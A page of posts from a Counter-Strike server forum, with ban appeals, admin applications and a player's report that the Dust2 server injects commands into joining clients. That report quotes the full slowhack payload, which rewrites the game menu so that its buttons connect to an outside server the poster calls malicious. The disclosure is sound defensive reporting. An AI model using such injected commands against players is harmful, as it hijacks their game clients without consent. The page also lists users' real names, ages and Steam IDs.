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Posted by: TMK_[NL]*RAGE - 08-15-2023, 09:49 PM - Forum: Accepted applications
- Replies (1)
Let me play.. stop banning me. you call everyone names FU this and that as soon i say fu2 . its insult.. you keep banning me. just leave me alone bruv. its getting annoying i didnt talk to you for days.. just unban me and leave me alone..
I'm not hackin ! I"M CLEAAAR i'm too old for this |
Posted by: shark.1g - 08-12-2023, 04:18 PM - Forum: Rejected applications
- Replies (1)
my nick name is shark.1g i got banned by SAVAGE there where two or three players who said i'm hacking and bam banned no check no ask for wargods ! I logged in with a different name! and he banned AGAIN me because of the WH that I'm not! so there it is my fault or it is the fault of the admin who did not differentiate the wh or the clear? i don't have the demo for the first one ban i have the demo of the second BAN with my another name srk
Hello agai
Banned for a wallhack i don't have |
Posted by: Cxx - 08-07-2023, 02:01 AM - Forum: Rejected applications
- Replies (3)
[AMXBans] ===============================================
[AMXBans] You have been banned from this Server by Admin HLL.
[AMXBans] There are 4 weeks , 1 day , 20 hours , 27 minutes and 45 seconds left of your ban.
[AMXBans] Banned Nickname : Cxx
[AMXBans] Reason : ' wallhack '
[AMXBans] You can complain about your ban @ www.arabian-servers.com
[AMXBans] Your SteamID : ' VALVE_1 : 0 : 987034066 '
[AMXBans] Your IP : ' 10*.1**.1**.49 '
[AMXBans] =======================================
Hi, got banned out of nowhere while i was playing for presumably Wallhack, tried to look for a recent demo or screeshots, but apparently this server didn't take any screenshots when you get banned and the most recent demo i could find is from april 19th...
But here it is in case you want it : https://files.catbox.moe/jkapgo.rar
Admin Apply: MultiPlayer CS |
Posted by: MultiPlayer CS - 07-16-2023, 12:52 PM - Forum: Rejected applications
- Replies (2)
Your Game Name: MultiPlayer CS
Your Real Name: Abdessamed
Your Age: 18
Your Facebook account: No Facebook.
Your Experience-tell us about yourself: I'm Abdou from Algeria, I join this server because is famouse, I request for admin because is an OLD server, the server has a nice players, respectful all members, As I'm admin I want to make the server clean, No hackers, no bad words, no camps, I want to try my best in the server, I will active in the server 3-5 hours per day because I love the server to much, I have a nice aim in the server, that why I request for admin, I wad admin in another server before and I know commands, how use commands, when we use commands, I understand that all of them, when i join Arabian server i meet some people from Algeria the best friends in server, I apply for admin because I want help other admin, and show news admin commands, etc, When I join Arabian server Every morning I read the rules in from, because the rules are changed in anytime, I will try my best as admin role.
Your Steam ID: STEAM_0:0:781231742
Your Steam Profile Link: https://steamcommunity.com/id/abdessamedvenom/
Server Name: [ Arabian Dust2 Server ]
GameTracker Link ( Arabian Dust 2 server ): https://www.gametracker.com/player/Multi...182:27015/
Dust2 Server Slowhacking Clients |
Posted by: NeedforSpeedo - 07-10-2023, 01:31 PM - Forum: Fixed Problems
- Replies (2)
Heya Need for Speedo here,
I just noticed that the Dust2 server is trying to inject commands in to player's clients when they join.
If I'm not mistaken the term for this is slowhack - injecting commands, changing binds, or in this case, it's trying to change the GameMenu so that players auto connect to some malicious server.
Here's the message I get on my console on every connection to the server:
Code: Server tried to send invalid command:"motdfile "resource/GameMenu.res"
"Server tried to send invalid command:"motd_write "GameMenu" { "1" { "label" "NewGame" "command" "engine Connect http://cwserverbre.zapto.org:27015" "3" { "label" "#GameUI_GameMenu_ResumeGame" "command" "ResumeGame" "OnlyInGame" "1" } "4" { "label" "#GameUI_GameMenu_Disconnect" "command" "Disconnect" "OnlyInGame" "1" "notsingle" "1" } "5" { "label" "#GameUI_GameMenu_PlayerList" "command" "OpenPlayerListDialog" "OnlyInGame" "1" "notsingle" "1" } "9" { "label" "" "command" "" "OnlyInGame" "1" } } "11" { "label" "#GameUI_GameMenu_FindServers" "command" "engine Connect http://cwserverbre.zapto.org:27015" } "12" { "label" "#GameUI_GameMenu_Options" "command" "OpenOptionsDialog" } "13" { "label" "#GameUI_GameMenu_Quit" "command" "Quit" } }
I have tried this with a 100% clean install of CS and it still happens. I talked to an admin and they confirmed that they also got it.
As far as I know it's likely 1 malicious amxmodx plugin that is doing this. According to this thread the 'add bot spectator' plugin has been seen to do this, but I can't speak for this specific server of course.
I think Valve patched this particular command some years ago but maybe some non-steam clients are vulnerable to it.
Not a huge problem for me but I think it's worrying and thought I should let you guys know.
Let me play admin Forget |
Posted by: __AnIMAgUs__ - 07-10-2023, 10:41 AM - Forum: Complains about Admins / الشكاوي عن ادمن
- Replies (3)
Hello/Salam all,
Gunshot here,
Want to bring attention of other players on this topic:-
"What impacts ping rate?
Many factors that impact ping are out of the user’s control. This includes the physical distance from the gaming system to the gaming server. With everything else being equal, a gamer 10 miles from the server will have a better ping rate than someone 100 miles from the server."
when you tell the other player to fix their ping you should be aware that ping does not only depend on the connection.
The server is somewhere in middle east and to decrease my ping do you want me to re-locate?
The Shift himself understand this issue and never kicked me for ping reason(or any reason at all).
The previous technical manager Nea has also made a thread discussing about this exact same things which you can find if u have time.
I do not lag just my ping is high.
I am playing in this server for almost 5+ years now with the same ping.
Now the reason why i put this thread in admin complaint section is because yesterday i was playing as CT against 1v3 'a' only bomb planted , i was in long and the moment bomb got planted i started rotating from short but the admin started slapping me for no reason at all that clearly shows the level of maturity this guy have.Not even a second passed after bomb being planted and still he does that......
Two incidence on two consecutive day with only one admin.
I am aware no action will be taken against the admin and i do not have any problem with that.
I do not hold any personal grudge against any player let alone admin Forget,all i ask is I have almost stopped playing this game let me play in peace whatever time i got,thanks!
Admin application |
Posted by: [x] - 07-09-2023, 12:34 AM - Forum: Rejected applications
- Replies (3)
In gam name : X
Real name : Islem
Age : 38
Experience : since 2002 i guess , head admin in ambrosia servers, admin in dzaur servers
STEAMID: "IslemiX"
STEAM PROFILE :https://steamcommunity.com/id/IslemiX/
Server : DUST 2 SERVER